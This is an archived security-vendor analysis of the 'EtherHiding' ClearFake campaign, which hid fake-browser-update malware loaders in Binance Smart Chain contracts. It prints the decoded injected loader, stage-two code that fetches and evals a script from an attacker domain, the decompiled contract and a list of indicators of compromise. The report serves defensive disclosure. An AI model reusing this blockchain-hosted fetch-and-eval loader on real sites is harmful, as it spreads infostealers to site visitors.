{
	"id": "1fd5b9b0-5e79-4fcc-9725-1ac66ab0d143",
	"created_at": "2026-04-06T00:06:27.272589Z",
	"updated_at": "2026-04-10T03:20:23.806226Z",
	"deleted_at": null,
	"sha1_hash": "bdcd3bab4556eb0925bb37bd391f56d43ea2dcff",
	"title": "“EtherHiding” — Hiding Web2 Malicious Code in Web3 Smart Contracts",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2664663,
	"plain_text": "“EtherHiding” — Hiding Web2 Malicious Code in Web3 Smart\r\nContracts\r\nBy Nati Tal,Oleg ZaytsevOctober 13, 2023•9min read\r\nArchived: 2026-04-05 19:40:29 UTC\r\nThe Evolving Fake Browser Update Campaign\r\nIn the last 2 months or so, we have been facing yet another “fake-update” malware propagation campaign. In the\r\nattack flow, a site is defaced with a very believable overlay demanding a browser update before the site can be\r\naccessed. The fake “update” turns out to be vicious infostealer malware like RedLine, Amadey, or Lumma.\r\nThe compromised Softoniclabs WordPress-based site, defaced to propagate malware\r\nThis campaign, named “ClearFake”, identified by Randy McEoin, begins its attack on compromised WordPress\r\nsites where attackers embed a concealed JS code. This initial “bridgehead” code is injected into article pages and\r\nretrieves a second-stage payload from a server controlled by the attackers, which then carries out the rest of the\r\nsite defacement.\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 1 of 12\n\nUsing this method, the attacker can remotely and instantly modify the infection process and display any message\r\nthey want. It can change tactics, update blocked domains, and switch out detected payloads without re-accessing\r\nthe WordPress sites. In the case of ‘ClearFake’, the second-stage code was hosted on Cloudflare Workers. This\r\nwas effective until CloudFlare blocked those accounts, potentially halting the entire campaign.\r\nYet, in this evolution of “ClearFake”, we see that threat actors have introduced a novel method of hosting\r\nmalicious code both anonymously and without any limitations — a real “Bullet Proof” hosting facilitated by\r\nthe Blockchain.\r\nNo Cryptoscams Here, So Why Binance?\r\nThe new infection process, at first glance, is the same as before — using the same domains and IP addresses, yet\r\non the first entry of the compromised WordPress site we see new unfamiliar network traffic directed to\r\nBinance-controlled servers. What does Binance, one of the world’s largest cryptocurrency exchanges, have to do\r\nwith it all? Well, let’s examine the new variant of the first stage code:\r\n\u003cscript src=\"https://cdn.ethers.io/lib/ethers-5.2.umd.min.js\" type=\"application/javascript\"\u003e\u003c/script\u003e\r\n\u003cscript src=\"data:text/javascript;base64,YXN5bmMgZnVuY3Rpb24gbG9hZCgpe2xldCBwcm92aWRlcj1uZXcgZXRoZXJz\r\nLnByb3ZpZGVycy5Kc29uUnBjUHJvdmlkZXIoImh0dHBzOi8vYnNjLWRhdGFzZWVkMS5iaW5hbmNlLm9yZy8iKSxzaWduZXI9cHJvd\r\n[......]b2FkOw==\"\u003e\u003c/script\u003e\r\nThe two script tags described above are the means by which threat actors take over an entire WordPress site.\r\nAttackers insert this code into the primary template of a WordPress site, often exploiting vulnerable plugins (e.g.\r\nBalada Injector), outdated WordPress versions, or using stolen site credentials acquired from the dark web.\r\nThe code above is just Base64 obfuscated, translated to the following being executed on every page loaded from\r\nthe compromised site:\r\n// include \u003chttps://cdn.ethers.io/lib/ethers-5.2.umd.min.js\u003e\r\nasync function load() {\r\n let provider = new ethers.providers.JsonRpcProvider(\"https://bsc-dataseed1.binance.org/\"),\r\n signer = provider.getSigner(),\r\n address = \"0x7f36D9292e7c70A204faCC2d255475A861487c60\",\r\n ABI = [\r\n { inputs: [{ internalType: \"string\", .......},\r\n { inputs: [], name: \"get\", ......},\r\n { inputs: [], name: \"link\", ....... },\r\n ],\r\n contract = new ethers.Contract(address, ABI, provider),\r\n link = await contract.get();\r\n eval(atob(link));\r\n}\r\nwindow.onload = load;\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 2 of 12\n\nThis part of the malicious code queries the BSC BlockChain. It creates a new contract instance by initializing it\r\nwith the provided, attacker-controlled, blockchain address. It also provides the ABI (Application Binary\r\nInterface) that declares the contract’s functions and structure. The function that is called is get() , and it will\r\nbasically query the contract to return a specified payload to be later decoded and evaluated as JavaScript code with\r\nthe eval() function.\r\nThe attack flow — from querying the BlockChain to total site defacing and malware download\r\nSmart Contracts? Code on the BlockChain?\r\nOK wait… what is this BSC? And what are those contracts anyhow?\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 3 of 12\n\nBSC, or Binance Smart Chain, launched three years ago, is Binance’s answer to Ethereum, designed to run\r\ndecentralized apps and “smart contracts” more efficiently. While Ethereum is a publicly owned blockchain with\r\ncryptocurrency and contracts capabilities, BSC is owned by Binance and focuses on contracts: coded agreements\r\nthat execute actions automatically when certain conditions are met. These contracts offer innovative ways to build\r\napplications and processes. Due to the publicly accessible and unchangeable nature of the blockchain, code can be\r\nhosted “on-chain” without the ability for a takedown.\r\nThis is what we see here in this attack — malicious code is hosted and served in a manner that can’t be\r\nblocked. Unlike hosting it on a Cloudflare Worker service as was mitigated on the earlier variant. Truly, it is a\r\ndouble-edged sword in decentralized tech.\r\nThe Malicious Smart Contract — Analyzed\r\nWe can’t see the actual code used to compile this contract, yet we do have access to its bytecode (decentralized\r\nand transparent after all). Once decompiled we can see its simple functionality in action:\r\ndef storage:\r\n stor0 is array of struct at storage 0\r\ndef update(string _newName) payable:\r\n require calldata.size - 4 \u003e= 32\r\n require _newName \u003c= -1\r\n require _newName + 35 \u003c calldata.size\r\n if _newName.length \u003e -1:\r\n revert with 'NH{q', 65\r\n require _newName + _newName.length + 36 \u003c= calldata.size\r\n if bool(stor0.length):\r\n if bool(stor0.length) == stor0.length.field_1 \u003c 32:\r\n revert with 'NH{q', 34\r\n if _newName.length:\r\n stor0[].field_0 = Array(len=_newName.length, data=_newName[all])\r\n else:\r\n {...}\r\ndef get() payable:\r\n if bool(stor0.length):\r\n if bool(stor0.length) == stor0.length.field_1 \u003c 32:\r\n revert with 'NH{q', 34\r\n {..}\r\n if stor0.length.field_1:\r\n if 31 \u003c stor0.length.field_1:\r\n mem[128] = uint256(stor0.field_0)\r\n idx = 128\r\n s = 0\r\n while stor0.length.field_1 + 96 \u003e idx:\r\n mem[idx + 32] = stor0[s].field_256\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 4 of 12\n\nidx = idx + 32\r\n s = s + 1\r\n continue\r\n return Array(len=2 * Mask(256, -1, stor0.length.field_1), data=mem[128 len ceil32(stor0.length\r\n mem[128] = 256 * stor0.length.field_8\r\n else:\r\n {...}\r\n return Array(len=stor0.length % 128, data=mem[128 len ceil32(stor0.length.field_1)], mem[(2 * ceil32(stor0.len\r\ndef unknown1c4695f4() payable:\r\n {...}\r\nThis is a simple contract app that uses the storage function of the contract (the array variable stor0 ). The\r\nmethod update() saves the input to this storage — byte by byte and the method get() reads the storage and\r\nreturns its value as a string. That way, by interacting with the contract, data can be written or updated on the chain.\r\nWe can see this in the transactions history on the BSC, starting on contract creation on the 9th of September 2023\r\nby another attacker-controlled address. That other address, created in late June 2022, was loaded with BNB (The\r\nBinance Coin) in an amount just enough to create and update the contract — activities that are not actually\r\npayable, yet do cost some minor customary “gas” fees (between 0.02 to 0.60 USD each):\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 5 of 12\n\nAttacker-controlled BSC addresses — from funding, contract creation, and ongoing code updates\r\nOnly the first update of the contract is clearly a test (as it actually included only the string “test”) but all the\r\nfollowing are obvious pieces of JavaScript code. When the first entries are quite simple, the latter add more\r\nJavaScript obfuscation techniques but keep on doing just the same few simple activities as seen in this first entry\r\n(after decoding from Base64):\r\nconst get_k_script = () =\u003e {\r\n let e = new XMLHttpRequest();\r\n return e.open(\"GET\", \"https://921hapudyqwdvy[.]com/vvmd54/\", !1), e.send(null), e.responseText;\r\n};\r\neval(get_k_script());\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 6 of 12\n\nThis is exactly the same code we’ve seen on earlier variants of ClearFake (as returned from the CloudFlare\r\nservice), only the second stage domain is being changed on an almost daily basis — this shows how easy it is to\r\nupdate the entire attack chain with a simple blockchain transaction.\r\nWe see that each time their domain is “burned” an update to the chain is issued to swap the malicious code and\r\naffiliated domains — at least 30 malicious domains and counting.\r\nDeploying Malicious Code From The BlockChain (For Free!)\r\nGetting back to the attack flow, once the first stage code on the compromised WordPress site loads, it calls the\r\nBinance’s SDK eth_call method on the BlockChain and fetches the malicious JavaScript code above.\r\neth_call is a read-only and cost-free operation, originally designed to simulate contract execution for reading\r\ndata or testing without any real-world impact. As such, it is not even recorded on the blockchain. So you get a\r\nfree, untracked, and robust way to get your data (the malicious payload) without leaving traces. As an example,\r\nthe compromised website makes your browser broadcast this JSON RPC command to the chain:\r\n{\r\n \"method\": \"eth_call\",\r\n \"params\": [\r\n {\r\n \"to\": \"0x7f36d9292e7c70a204facc2d255475a861487c60\",\r\n \"data\": \"0x6d4ce63c\"\r\n },\r\n \"latest\"\r\n ],\r\n \"id\": 44,\r\n \"jsonrpc\": \"2.0\"\r\n}\r\nAnd getting back the following response (truncated for display):\r\n{\r\n \"jsonrpc\": \"2.0\",\r\n \"id\": 44,\r\n \"result\": \"0x000000[..]00000e385a6e56755933527062323467624368594c4[........]\"\r\n}\r\nThe resulting payload is a binary-coded string, exactly the one that was pushed to that contract using the\r\nupdate() method just a day before. It includes the latest second-stage domain address, which is being queried to\r\nget yet another payload to evaluate and execute on your browser.\r\nNote that this second stage domain is hosted on the same Russian-based IP address and follows the attack flow of\r\nthe earlier ClearFake variant. The action is of defacing the site with a quite advanced and well-designed deceptive\r\noverlay page — localized and customized per almost all popular browsers in use:\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 7 of 12\n\nClearFake’s deceptive browser update notices\r\nFighting Back? Is It Even Possible?\r\nWell, there are inherent challenges in mitigating this kind of abuse due to the decentralized nature of blockchain\r\nsystems.\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 8 of 12\n\nOnce a smart contract is deployed on BSC, it operates autonomously. Binance can’t just “shut it down.” The only\r\nthing they can do and currently offer — is the ability of the community and developers to be warned about a\r\ncontract if identified as malicious or part of an illegal activity. How? Well, it is being tagged on the official\r\nBSCScan service as such:\r\nBscScan — Binance’s official BSC explorer showing Fake and Malicious tags\r\nIndeed, the address used to deliver the malicious code was clearly marked as “ Fake_Phishing2561 ”. Is this\r\nenough? Hardly. As this is not an address used in any financial or other activity that victims can be lured to\r\ntransfer funds or any other kind of Intellectual property to — visitors of compromised WordPress sites have no\r\nclue as to what is going on under the hood. This contract, tagged as Fake Malicious or whatnot, is still online and\r\ndelivers the malicious payload — apparently, as of today, there is NO WAY TO STOP IT.\r\n“EtherHiding”- Even More Threatning Possibilities\r\nA critical point of intervention to halt such campaigns lies in understanding why WordPress sites are so vulnerable\r\nand frequently compromised, as they serve as primary gateways for these threats to reach a vast pool of victims.\r\nTo protect your site and, eventually, all your visitors, you should always keep your WordPress infra and plugins\r\nupdated, safeguarding credentials, using robust, periodically-changed passwords and just keeping an eye on what\r\nis happening in your site!\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 9 of 12\n\nAnd back to the big picture. Traditionally, many malicious campaigns are curtailed by blocking domains, and IPs,\r\nor issuing abuse reports to providers. Financially crippling these perpetrators often becomes the final resort.\r\nHowever, the advent of blockchain, as demonstrated by “EtherHiding”, ushers in new challenges.\r\nBeyond this specific exploit, blockchain can be misused in myriad ways, from malware propagation stages to data\r\nexfiltration of stolen credentials and files, all eluding traditional law enforcement shutdown methods.\r\nWhile Web 3.0 heralds innovation, malicious actors continually adapt, leveraging its benefits for nefarious gains.\r\nAs for Binance, We can’t really blame them, as the data is free for all and everyone can check and detect misuse\r\n— but hey, why won’t Binance just disable any query to already tagged as “Malicious” addresses? Or at least let’s\r\ndisable this eth_call debug method for unvalidated contracts?\r\nIOCs\r\nRelated BSC Addresses/Contracts:\r\n-----------------------------------\r\n0xfc1fE66FB63c542A3e4D45305DaB196E5EcA222A\r\n0x7f36D9292e7c70A204faCC2d255475A861487c60\r\n3rd Stage IP Addresses:\r\n-----------------------\r\n109[.]248[.]206[.]49\r\n3rd Stage Attacker Controlled Domains:\r\n--------------------------------------\r\n921hapudyqwdvy[.]com\r\n98ygdjhdvuhj[.]com\r\nboiibzqmk12j[.]com\r\nbookchrono8273[.]com\r\nbpjoieohzmhegwegmmuew[.]online\r\ncczqyvuy812jdy[.]com\r\nindogevro22tevra[.]com\r\nioiubby73b1n[.]com\r\nkjniuby621edoo[.]com\r\nlminoeubybyvq[.]com\r\nnbvyrxry216vy[.]com\r\nnmbvcxzasedrt[.]com\r\noekofkkfkoeefkefbnhgtrq[.]space\r\noiouhvtybh291[.]com\r\noiuugyfytvgb22h[.]com\r\noiuytyfvq621mb[.]org\r\nojhggnfbcy62[.]com\r\nopkfijuifbuyynyny[.]com\r\npklkknj89bygvczvi[.]com\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 10 of 12\n\npoqwjoemqzmemzgqegzqzf[.]online\r\npwwqkppwqkezqer[.]site\r\nreedx51mut[.]com\r\nsioaiuhsdguywqgyuhuiqw[.]org\r\nug62r67uiijo2[.]com\r\nvcrwtttywuuidqioppn1[.]com\r\nvvooowkdqddcqcqcdqggggl[.]site\r\nytntf5hvtn2vgcxxq[.]com\r\nzasexdrc13ftvg[.]com\r\nziucsugcbfyfbyccbasy[.]com\r\nCompromised WordPress Sites (Detected Last 14 Days):\r\n----------------------------------------------------\r\nkprofiles[.]com\r\nanimexin[.]vip\r\ncoloredmanga[.]com\r\ngayvidsclub[.]com\r\ndailyangelprayers[.]net\r\nhealthella[.]com\r\ntechsprobe[.]com\r\navionprivat[.]ro\r\n..\r\n..\r\n..\r\n--\u003e 510 More Domains Here --\u003e https://pastebin.com/x23iWvix\r\nMalware Hashes (samples):\r\n------------------------------------\r\nd0c56875fb19a407a86292e35dffec6caabbdbf630fbb79de4eec04708fa7b66\r\n37bba90d20e429ce3fd56847e4e7aaf83c62fdd70a7dbdcd35b6f2569d47d533\r\nb029b40badab029cbd916ab2e5147e9f01abd147e1bf9e5ed1564ee44a0d087f\r\n1a99ac759fcd881729b76c2904476b4201e794df2d0547c954ea37be7c153131\r\n633124ed8d7af6dd22722ee43abfe9b0ad97798a1d48b951abdc1ad88e83c702\r\n3db1afee107cf2fa57d13e60c13c87dd1c22bfa9ef23dcf369d52dd9807a5ff4\r\n1743f4a392b6d2ad0d47a7a57e277e1a29ecf459275b604919a6131739afdaad\r\n788567d3cc693dd5d0dada9f4e1421755c1d74257544ba12b502f085a620585e\r\n3d77b34ba6dbb49d594e2be590a87f682e1875d2565ff18bdeafc66c9d5594ea\r\n80f05865e59ec4e12e504adbf5fae3d706b5d27e5ab2fc52fcd0feb19365c7b0\r\ne041b3eaaed1c0ad37e7f91717ee5b0e12e922b67bbe1e69a4c68c80baf22b4f\r\n8ba53b5d773bc157df65fb0941c24e1edbc7c7b47e37b3f7a01751fc3b1a701a\r\n2ab315537510fc91d73825d0d6661e9f4b141799877e2f5159892886265f362e\r\nMalware Filename samples (Note UNICODE abuse in filenames):\r\n--------------------\r\nChrоmеSеtuр.appx\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 11 of 12\n\nChrоmеSеtuр.exe\r\nСhrоmеSеtup.exe\r\nChrоmеSеtuр.msi\r\nMlсrоsоftЕdgеSеtup.appx\r\nMlсrоsоftЕdgеSеtup.exe\r\nMlсrоsоftЕdgеSеtup.msi\r\nMlсrоsоftЕdgеSеtup.msix\r\nSetup_win64_2.49.0.4_release.exe\r\nSetup_win64_5.49.1031-release.exe\r\nSource: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nhttps://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16"
	],
	"report_names": [
		"etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16"
	],
	"threat_actors": [],
	"ts_created_at": 1775433987,
	"ts_updated_at": 1775791223,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bdcd3bab4556eb0925bb37bd391f56d43ea2dcff.pdf",
		"text": "https://archive.orkl.eu/bdcd3bab4556eb0925bb37bd391f56d43ea2dcff.txt",
		"img": "https://archive.orkl.eu/bdcd3bab4556eb0925bb37bd391f56d43ea2dcff.jpg"
	}
}